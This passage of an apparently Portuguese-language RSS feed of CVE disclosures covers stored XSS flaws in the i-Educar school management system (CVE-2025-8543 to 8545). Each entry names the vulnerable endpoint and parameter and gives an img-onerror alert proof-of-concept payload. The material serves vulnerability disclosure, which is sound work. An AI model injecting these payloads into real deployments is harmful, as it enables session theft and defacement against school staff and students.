&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8543-cross-site-scripting-xss-armazenado-no-endpoint-educar_raca_cadphp-parâmetro-nm_raca&amp;#34;&amp;gt;CVE-2025-8543: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8543&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8543&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8543/image.png&amp;#34;
	width=&amp;#34;628&amp;#34;
	height=&amp;#34;253&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8543/image_hu_657529f7cbce2b77.png 480w, /p/cve-2025-8543/image_hu_c95c71084112a8f3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;248&amp;#34;
		data-flex-basis=&amp;#34;595px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8543.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8543.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8544</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8544/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8544/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8544-cross-site-scripting-xss-armazenado-no-endpoint-regraavaliacaoedit-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8544: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8544&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8544-cross-site-scripting-xss-armazenado-no-endpoint-regraavaliacaoedit-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8544: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8544&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;RegraAvaliacao/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8544/image.png&amp;#34;
	width=&amp;#34;617&amp;#34;
	height=&amp;#34;264&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8544/image_hu_5bcb3566c566cb66.png 480w, /p/cve-2025-8544/image_hu_835b7da877dee7e9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;560px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8544.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8544.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8545</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8545/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8545/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8545-cross-site-scripting-xss-armazenado-no-endpoint-educar_motivo_afastamento_cadphp-parâmetro-nm_motivo&amp;#34;&amp;gt;CVE-2025-8545: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8545&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8545&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8545-cross-site-scripting-xss-armazenado-no-endpoint-educar_motivo_afastamento_cadphp-parâmetro-nm_motivo&amp;#34;&amp;gt;CVE-2025-8545: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8545&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8545&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_motivo_afastamento_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nm_motivo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8545/image.png&amp;#34;
	width=&amp;#34;642&amp;#34;
	height=&amp;#34;280&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8545/image_hu_c4c84f0f5992b394.png 480w, /p/cve-2025-8545/image_hu_1f598e1f64a3f4ff.png 1024w&amp;#34;
